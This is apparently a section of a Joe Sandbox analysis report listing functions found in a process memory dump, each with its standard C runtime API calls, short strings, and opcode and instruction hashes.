Instruction ID: 6c0ec5f27cd13b60a5cfbd8966726cc7817b39333c15dba52426033eef05762c
Opcode Fuzzy Hash: a76c902aac66ce8a9f6a76da84942a6eea7ff2ef8da404a7c7f314b1b38f5c6d
Instruction Fuzzy Hash: 04018732C4022A9BCB13FB60C868BEE72326F81771F114719D8207B2A0DB349A06CF95

Uniqueness

Uniqueness Score: -1.00%

Function 027A6EAB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027A6EB2
std::_Lockit::_Lockit.LIBCPMT ref: 027A6EBC

Part of subcall function 027A04C5: std::_Lockit::_Lockit.LIBCPMT ref: 027A04D3

std::bad_exception::bad_exception.LIBCMT ref: 027A6F09
__CxxThrowException@8.LIBCMT ref: 027A6F17
std::locale::facet::_Incref.LIBCPMT ref: 027A6F27
std::locale::facet::_Facet_Register.LIBCPMT ref: 027A6F2D

Strings

>OC, xrefs: 027A6EAD

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: >OC
API String ID: 158301680-1233146472
Opcode ID: 8262a69d13b8d466fd237564d1e93ba8e6c20875df895f0f133192e0a9897a82
Instruction ID: 3ceeb651fd0e3aa1c129899b7284b7f472db79d69b9634ebbbc2ac4b3e2bff6e
Opcode Fuzzy Hash: 8262a69d13b8d466fd237564d1e93ba8e6c20875df895f0f133192e0a9897a82
Instruction Fuzzy Hash: EA015772D51129ABCB12FF64C868AEE72766F81771F190714D820772A0DB389A058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 027A0435 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 027A043C
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 027A044C

Part of subcall function 027AF7D6: _setlocale.LIBCMT ref: 027AF7E8

_free.LIBCMT ref: 027A045A
_free.LIBCMT ref: 027A046C
_free.LIBCMT ref: 027A047E
_free.LIBCMT ref: 027A0490

Strings

jNC, xrefs: 027A0437

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _free$H_prolog3Locinfo::_Locinfo_dtor_setlocalestd::_
String ID: jNC
API String ID: 3393013280-992929093
Opcode ID: 47405664b8173eba8729e30f8428ee773c43a6df3c6d79582625bed888d2ed41
Instruction ID: 95c32574618601b6c6af921aacf8731b160a0c531dd8c116757d2d4fad6c99d0
Opcode Fuzzy Hash: 47405664b8173eba8729e30f8428ee773c43a6df3c6d79582625bed888d2ed41
Instruction Fuzzy Hash: AB014B716007019BEB21EE74C529B9B73A9AF82739F109A0DD055C79C0DB39E5048E69

Uniqueness

Uniqueness Score: -1.00%

Function 0279D65F Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0279D669
__time64.LIBCMT ref: 0279D69D

Part of subcall function 027B127B: __aulldiv.LIBCMT ref: 027B12A6

__localtime64_s.LIBCMT ref: 0279D6B1
_asctime_s.LIBCMT ref: 0279D6C3

Part of subcall function 027A75F4: _memset.LIBCMT ref: 027A762C

Strings

TC, xrefs: 0279D8CC
TC, xrefs: 0279DBE2

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3___aulldiv__localtime64_s__time64_asctime_s_memset
String ID: TC$TC
API String ID: 2829894211-1707797727
Opcode ID: 95d44495edf78d79452364c42c12cafa7c50e81c05ec82faeb4604d1ce9eb773
Instruction ID: 86b41218157649ce47f5c630f7a82a018a0a266158d78aa6ab6029e220433244
Opcode Fuzzy Hash: 95d44495edf78d79452364c42c12cafa7c50e81c05ec82faeb4604d1ce9eb773
Instruction Fuzzy Hash: 93025D71440218EFEB16ABA0ED8DEEEB77CFB46709F0001A9F105A21A0DB754F459F66

Uniqueness

Uniqueness Score: -1.00%

Function 0279AC99 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 321COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0279ACA3
_memset.LIBCMT ref: 0279ACCA
_memset.LIBCMT ref: 0279ACDB

Part of subcall function 027A882B: _memset.LIBCMT ref: 027A884C

_memset.LIBCMT ref: 0279AEFD

Part of subcall function 027967B8: std::_Xinvalid_argument.LIBCPMT ref: 027967CB

Strings

C, xrefs: 0279AD05
D, xrefs: 0279AFC5

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_Xinvalid_argumentstd::_
String ID: D$C
API String ID: 2761207222-506208229
Opcode ID: b7034b7da801be0550da0616f0dc6d62ace77651f4e6ecec1d7f8918edc21c58
Instruction ID: c6ffbd3b074f7bd1cd59d7e7185c2cd904e147932d7b61f75969c275a075a16e
Opcode Fuzzy Hash: b7034b7da801be0550da0616f0dc6d62ace77651f4e6ecec1d7f8918edc21c58
Instruction Fuzzy Hash: 35D193B2840218ABEB12DBA0EC4DEDEB77CBF4A714F0004E9F609A2150DB749B55DF55

Uniqueness

Uniqueness Score: -1.00%

Function 027B3613 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 027B3694
_strncmp.LIBCMT ref: 027B36D7
_strlen.LIBCMT ref: 027B36E5
_strcspn.LIBCMT ref: 027B370B
__setlocale_get_all.LIBCMT ref: 027B381B

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __setlocale_get_all_strcspn_strlen_strncmp_strpbrk
String ID:
API String ID: 3252769141-0
Opcode ID: ca56f24f066126720aac13b43ab7844d6e792f4848b387234b5fc3a95835a2dd
Instruction ID: 91abb1af2f98c126735789e1c630816cccbe057d346489a5703ea93301e59362
Opcode Fuzzy Hash: ca56f24f066126720aac13b43ab7844d6e792f4848b387234b5fc3a95835a2dd
Instruction Fuzzy Hash: F151E8B1D002569EEF335A348C85BE9B7B8AF01354F1444EAD549E3142DF319AC48F61

Uniqueness

Uniqueness Score: -1.00%

Function 027A9FDD Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 384COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A9FE7

Part of subcall function 027A07E5: std::locale::facet::_Incref.LIBCPMT ref: 027A07EC

Part of subcall function 027AA974: __EH_prolog3.LIBCMT ref: 027AA97B
Part of subcall function 027AA974: std::_Lockit::_Lockit.LIBCPMT ref: 027AA985

_localeconv.LIBCMT ref: 027AA089
_strcspn.LIBCMT ref: 027AA194

Strings

e, xrefs: 027AA09B
`D, xrefs: 027AA3AA

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
String ID: `D$e
API String ID: 441263477-2332963161
Opcode ID: 43c4880056e0a8f491c6c1d00dff4cc3780483d445836ab921a15be90f4debcb
Instruction ID: 3adc11bb157a1cefcbff5f5bb3bb66d1b7216d240687867eb7d9df068abd320c
Opcode Fuzzy Hash: 43c4880056e0a8f491c6c1d00dff4cc3780483d445836ab921a15be90f4debcb
Instruction Fuzzy Hash: 1A021071D00208DFCF16DFA8C894AEDBBB2FF48314F15826AE909AB251D731AA55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 027A2AD0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A2ADA

Part of subcall function 027A689C: __EH_prolog3.LIBCMT ref: 027A68A3

Part of subcall function 027A6BC4: __EH_prolog3.LIBCMT ref: 027A6BCB
Part of subcall function 027A6BC4: std::_Mutex::_Mutex.LIBCPMT ref: 027A6BDC
Part of subcall function 027A6BC4: std::locale::_Init.LIBCPMT ref: 027A6BF3
Part of subcall function 027A6BC4: std::locale::facet::_Incref.LIBCPMT ref: 027A6C01

Part of subcall function 027A6C60: __EH_prolog3.LIBCMT ref: 027A6C67

Part of subcall function 027A703E: __EH_prolog3_catch.LIBCMT ref: 027A7045

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 027A2EF4

Part of subcall function 027967B8: std::_Xinvalid_argument.LIBCPMT ref: 027967CB

Strings

TC, xrefs: 027A2DB7
BC, xrefs: 027A2BF3
+[C, xrefs: 027A2AD5

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3$std::_$H_prolog3_H_prolog3_catchIncrefInitIos_base_dtorMutexMutex::_Xinvalid_argumentstd::ios_base::_std::locale::_std::locale::facet::_
String ID: +[C$BC$TC
API String ID: 695634691-3132040622
Opcode ID: 15b8d65d8a1e6a0ea552a827055f4569af8b7ed84cb50e3cc5cdc0e02007a4d0
Instruction ID: 72915398e6d51aa7efe35deadc6ae818929a036e9cff1192b11ef066947706f1
Opcode Fuzzy Hash: 15b8d65d8a1e6a0ea552a827055f4569af8b7ed84cb50e3cc5cdc0e02007a4d0
Instruction Fuzzy Hash: 40D18D718002089FDF15DFA8DC94EEEBBB9FF49314F108669E516A71A1DB305A49CF24

Uniqueness

Uniqueness Score: -1.00%

Function 027B4699 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 027B46C1

Part of subcall function 027B2A47: __getptd.LIBCMT ref: 027B2A55
Part of subcall function 027B2A47: __getptd.LIBCMT ref: 027B2A63

__getptd.LIBCMT ref: 027B46CB

Part of subcall function 027B76DC: __getptd_noexit.LIBCMT ref: 027B76DF
Part of subcall function 027B76DC: __amsg_exit.LIBCMT ref: 027B76EC

__getptd.LIBCMT ref: 027B46D9
__getptd.LIBCMT ref: 027B46E7
__getptd.LIBCMT ref: 027B46F2
_CallCatchBlock2.LIBCMT ref: 027B4718

Part of subcall function 027B2AEC: __CallSettingFrame@12.LIBCMT ref: 027B2B38

Part of subcall function 027B47BF: __getptd.LIBCMT ref: 027B47CE
Part of subcall function 027B47BF: __getptd.LIBCMT ref: 027B47DC

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: a881b663b6c484ed2186585f4bf8c092b2ae68bbcf07e7a42e74e4d78b0dbd34
Instruction ID: 3a98c10521cf0640a2df0c9c3b229d90d2cb907bc1112c9649705240068afd6a
Opcode Fuzzy Hash: a881b663b6c484ed2186585f4bf8c092b2ae68bbcf07e7a42e74e4d78b0dbd34
Instruction Fuzzy Hash: 1E1119B1C10209DFDF02EFA4C848BEEBBB2FF04314F108069E814AB251DB389A119F54

Uniqueness

Uniqueness Score: -1.00%

Function 027A152C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A1536
_memset.LIBCMT ref: 027A157A

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

_memset.LIBCMT ref: 027A15C3

Part of subcall function 027A0D53: __EH_prolog3_GS.LIBCMT ref: 027A0D5A
Part of subcall function 027A0D53: _memset.LIBCMT ref: 027A0DA8

Strings

taC, xrefs: 027A1531
TC, xrefs: 027A165B

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_$_malloc_rand
String ID: TC$taC
API String ID: 404759188-333880395
Opcode ID: 922987d2a6e45639a2919c3aff39d47da30a4fb3f66a46de2fc9a769a38ea717
Instruction ID: 17d97a53fc683962f2f69531588142264d57a58cae8371d01b98e56f9465196a
Opcode Fuzzy Hash: 922987d2a6e45639a2919c3aff39d47da30a4fb3f66a46de2fc9a769a38ea717
Instruction Fuzzy Hash: 8F615E76940218AFEB119F60EC4DFDEBB78FF09315F1000A5F609A2160DB758EA09F5A

Uniqueness

Uniqueness Score: -1.00%

Function 027A5218 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A5222
_memset.LIBCMT ref: 027A525E
_memset.LIBCMT ref: 027A526F

Part of subcall function 027A882B: _memset.LIBCMT ref: 027A884C

_memset.LIBCMT ref: 027A5324

Strings

BC, xrefs: 027A546A

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_
String ID: BC
API String ID: 2126626869-447861928
Opcode ID: 7fb7912e074016de286a029b47adcbb186008f97972e6f9cd9e484c4623d9714
Instruction ID: c0fb55db5c2800d4cbf8022d4ee278d0c8702443fd7f0e26e217b632a9a364d3
Opcode Fuzzy Hash: 7fb7912e074016de286a029b47adcbb186008f97972e6f9cd9e484c4623d9714
Instruction Fuzzy Hash: F3612CB2C00228ABDF269F60DC99BDAB7BDBF49314F0041E9A519A2150DB71AF85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0279FBA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0279FBBF
_memset.LIBCMT ref: 0279FBCC

Strings

@, xrefs: 0279FBEB
<, xrefs: 0279FBE4
D, xrefs: 0279FC07

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset
String ID: <$@$D
API String ID: 2102423945-1829429720
Opcode ID: 866789b83d617802dd3756121be3158b2e7b452e982e445d1caaf7aeffd21478
Instruction ID: f8d5edee70ba1eb7dfba3f6e2e3864849d86dfafb3aaa4d058c26610860cf6db
Opcode Fuzzy Hash: 866789b83d617802dd3756121be3158b2e7b452e982e445d1caaf7aeffd21478
Instruction Fuzzy Hash: 6D01E171A00208ABEB15DFA8DD89FEDB7BCEF05704F504029E615E7181DB74A6058F59

Uniqueness

Uniqueness Score: -1.00%

Function 027A3E9A Relevance: 7.7, APIs: 5, Instructions: 246COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A3EA4
_memset.LIBCMT ref: 027A3EC4
_memset.LIBCMT ref: 027A3EEA
_memset.LIBCMT ref: 027A3F01
_memset.LIBCMT ref: 027A3F18

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_
String ID:
API String ID: 2126626869-0
Opcode ID: 1421634a32fef162e18bd3d6d20abdd50f0db3cd48c03be9a8096da703d3212d
Instruction ID: f7825aad8d84995a8e0f961d6f59b7a5e77eb691f4e6f2b4d675a4552c5b317f
Opcode Fuzzy Hash: 1421634a32fef162e18bd3d6d20abdd50f0db3cd48c03be9a8096da703d3212d
Instruction Fuzzy Hash: CDA13C7598412CAFEB229FA0DC45FDABB7CEB05304F0041E7B509A2160E7716F989F65

Uniqueness

Uniqueness Score: -1.00%

Function 027B2C36 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 027B2C3D

Part of subcall function 027B7663: ___set_flsgetvalue.LIBCMT ref: 027B7675
Part of subcall function 027B7663: __calloc_crt.LIBCMT ref: 027B7689
Part of subcall function 027B7663: __initptd.LIBCMT ref: 027B76B2

__calloc_crt.LIBCMT ref: 027B2C5F
__get_sys_err_msg.LIBCMT ref: 027B2C7D
_strcpy_s.LIBCMT ref: 027B2C85
__invoke_watson.LIBCMT ref: 027B2C9A

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID:
API String ID: 788502912-0
Opcode ID: f6d23e7b61b107a5efef888bbb13d354c7e21427760c7fa51db073491eab21b8
Instruction ID: 8a725f475915b9787c309cc2ae1d45a2d73663622cb956c3b283555288d045b6
Opcode Fuzzy Hash: f6d23e7b61b107a5efef888bbb13d354c7e21427760c7fa51db073491eab21b8
Instruction Fuzzy Hash: 0DF02B336033142BD72339355D8CBEBB29ECF84715F10053AFD05A7202EA25DC004595

Uniqueness

Uniqueness Score: -1.00%

Function 027A03BB Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 027A03C2
std::_Lockit::_Lockit.LIBCPMT ref: 027A03CF
std::exception::exception.LIBCMT ref: 027A0406

Part of subcall function 027B0065: std::exception::_Copy_str.LIBCMT ref: 027B0080

__CxxThrowException@8.LIBCMT ref: 027A041B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 027A0424

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::_std::exception::exception
String ID:
API String ID: 3348245949-0
Opcode ID: bd64110f63a02c889ccbcee764cd62bbfc3f9d60d07ff136e97ef7e0acdb985e
Instruction ID: 5dc5473c971a9fb331429fdcba400a8b995c137b5b457866f27daf4721123ef6
Opcode Fuzzy Hash: bd64110f63a02c889ccbcee764cd62bbfc3f9d60d07ff136e97ef7e0acdb985e
Instruction Fuzzy Hash: 2001DF71501744AECB22EF6980845CFFFE4BF18310F90C51EE58A97601DB34A608CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 027B74B3 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 027B74BF

Part of subcall function 027B76DC: __getptd_noexit.LIBCMT ref: 027B76DF
Part of subcall function 027B76DC: __amsg_exit.LIBCMT ref: 027B76EC

__getptd.LIBCMT ref: 027B74D6
__amsg_exit.LIBCMT ref: 027B74E4
__lock.LIBCMT ref: 027B74F4
__updatetlocinfoEx_nolock.LIBCMT ref: 027B7508

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: db3f59d85101100d1bd1506e57433dcd8f9933c2fc8e7c504a40bf7fb8aeedd0
Instruction ID: 6b58ebeb55a726ced037c206c67d174a9a9082cf742460a608add5ea120d29b0
Opcode Fuzzy Hash: db3f59d85101100d1bd1506e57433dcd8f9933c2fc8e7c504a40bf7fb8aeedd0
Instruction Fuzzy Hash: E6F0B433E04714DFD72BBB785809BDDBBD2AF40726F104149E515AB2D0DB245641CE5B

Uniqueness

Uniqueness Score: -1.00%

Function 0279EC5B Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0279EC65
_memset.LIBCMT ref: 0279EEA4

Part of subcall function 0279E9EC: __EH_prolog3.LIBCMT ref: 0279E9F3

Strings

DD, xrefs: 0279EEE3
C, xrefs: 0279EEAC

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3__memset
String ID: DD$C
API String ID: 755347604-3975538312
Opcode ID: a92664a46b38a576d29af516d8f108a707f4fbdfe09b6060c530668096c0429f
Instruction ID: 6e571003e8b02f2cf4bd7ff1745c52d3761b338a4d893e23e8ccbd73cf358db1
Opcode Fuzzy Hash: a92664a46b38a576d29af516d8f108a707f4fbdfe09b6060c530668096c0429f
Instruction Fuzzy Hash: A8D129728012589FDF25EFA4EC88BDEB7B9AF45304F0045EAE509A7190DA715F84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 027A589B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 304COMMON

Download Yara Rule

APIs

Part of subcall function 027A561A: _memset.LIBCMT ref: 027A5646
Part of subcall function 027A561A: _memset.LIBCMT ref: 027A5658

Part of subcall function 027A5218: __EH_prolog3_GS.LIBCMT ref: 027A5222
Part of subcall function 027A5218: _memset.LIBCMT ref: 027A525E
Part of subcall function 027A5218: _memset.LIBCMT ref: 027A526F
Part of subcall function 027A5218: _memset.LIBCMT ref: 027A5324

Part of subcall function 027A5036: __EH_prolog3_GS.LIBCMT ref: 027A5040
Part of subcall function 027A5036: _memset.LIBCMT ref: 027A5075
Part of subcall function 027A5036: _memset.LIBCMT ref: 027A50AA

_memset.LIBCMT ref: 027A5BBC
_memset.LIBCMT ref: 027A5BCD
_memset.LIBCMT ref: 027A5BDE

Part of subcall function 027A2F1A: __EH_prolog3_GS.LIBCMT ref: 027A2F24

Part of subcall function 027A3E9A: __EH_prolog3_GS.LIBCMT ref: 027A3EA4
Part of subcall function 027A3E9A: _memset.LIBCMT ref: 027A3EC4
Part of subcall function 027A3E9A: _memset.LIBCMT ref: 027A3EEA
Part of subcall function 027A3E9A: _memset.LIBCMT ref: 027A3F01
Part of subcall function 027A3E9A: _memset.LIBCMT ref: 027A3F18

Part of subcall function 027A2AD0: __EH_prolog3_GS.LIBCMT ref: 027A2ADA

Strings

BC, xrefs: 027A5C9A

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3_
String ID: BC
API String ID: 2126626869-447861928
Opcode ID: 8f32eae6d6f1be62f1c9463c4e1508b308385b27efc07c95df09a10d94ab4507
Instruction ID: 389c7e8e4dd99c5f24055b58dae7a87c7d646416a3395210bf6202ecbd5b02a4
Opcode Fuzzy Hash: 8f32eae6d6f1be62f1c9463c4e1508b308385b27efc07c95df09a10d94ab4507
Instruction Fuzzy Hash: CBB1E27AD00104ABDB2BEF60EC69DEB777ABB8A360B040169E50253270CB755D41EF9D

Uniqueness

Uniqueness Score: -1.00%

Function 027938C2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 027938E1
_strcpy_s.LIBCMT ref: 02793A44
_strcpy_s.LIBCMT ref: 02793A85

Strings

BC, xrefs: 02793A35

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _strcpy_s$H_prolog3
String ID: BC
API String ID: 3206971937-447861928
Opcode ID: b0de7ec2bdb0cc9109a830f797472f3d466556becc85f46483b7a11c6b88d4b8
Instruction ID: 0142fd60d3ce24f3a481e64a7ae6186244c26f4ce0e6906c3f16519b630bc740
Opcode Fuzzy Hash: b0de7ec2bdb0cc9109a830f797472f3d466556becc85f46483b7a11c6b88d4b8
Instruction Fuzzy Hash: 66A17BB1900249AFDF21DFA4DD84BEEBBB9FB48304F14416AE949E7240D735AA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 027A1142 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A114C
_memset.LIBCMT ref: 027A1188

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

_memset.LIBCMT ref: 027A11D3

Strings

C, xrefs: 027A11DB

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3__malloc_rand
String ID: C
API String ID: 1596740369-2515487769
Opcode ID: 8701b69ac2a235c20b44a92ae9fff52e43a07d601432bd4d3421b5634dd54f34
Instruction ID: 9c0894b4a0f0ceb3ab01270ef6d7f802f8ab56c1e981e7884c20aec776213f23
Opcode Fuzzy Hash: 8701b69ac2a235c20b44a92ae9fff52e43a07d601432bd4d3421b5634dd54f34
Instruction Fuzzy Hash: A7A15076944218AFEB205FA0EC4DFDABB79FB09315F0004E5F209E2161DB758E909F19

Uniqueness

Uniqueness Score: -1.00%

Function 027A4298 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 027A4352
_memset.LIBCMT ref: 027A4364
_memset.LIBCMT ref: 027A4489

Strings

C, xrefs: 027A430C

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset
String ID: C
API String ID: 2102423945-2515487769
Opcode ID: eac76f5a90570906f7121cc37cfe5aabeb0ee2e0a317d449631fb794b41cc67f
Instruction ID: e2c453c22bdd97265f8a6d3e7c69f65d89e126491edfdb0b79d6c395b5bb0802
Opcode Fuzzy Hash: eac76f5a90570906f7121cc37cfe5aabeb0ee2e0a317d449631fb794b41cc67f
Instruction Fuzzy Hash: A9615AB694011CABDF209FA0EC49FDAB7BCBB09705F0004E6A609E2150E775DA94DF66

Uniqueness

Uniqueness Score: -1.00%

Function 027A79A2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A79AC
__time64.LIBCMT ref: 027A79C3

Part of subcall function 027B127B: __aulldiv.LIBCMT ref: 027B12A6

__localtime64.LIBCMT ref: 027A79DC

Part of subcall function 027B0CD9: __localtime64_s.LIBCMT ref: 027B0CEE

Part of subcall function 027A8159: __EH_prolog3_GS.LIBCMT ref: 027A8163
Part of subcall function 027A8159: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 027A8266

Strings

D, xrefs: 027A7AE9

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3_$Ios_base_dtor__aulldiv__localtime64__localtime64_s__time64std::ios_base::_
String ID: D
API String ID: 1577701819-1145219676
Opcode ID: cd13abe2bfd54871307b5e673d93c9cf3168a5338fa47a04560cd970b0b44e93
Instruction ID: 3a66194f8765ae7718ef92b26a356119c8daf475ea8bcb8f721cf4f3cd096be6
Opcode Fuzzy Hash: cd13abe2bfd54871307b5e673d93c9cf3168a5338fa47a04560cd970b0b44e93
Instruction Fuzzy Hash: 64611BB1801218AEDB56EBA4ED98FDEB7BDEF55344F0441E9A409B3250EA305F44CF61

Uniqueness

Uniqueness Score: -1.00%

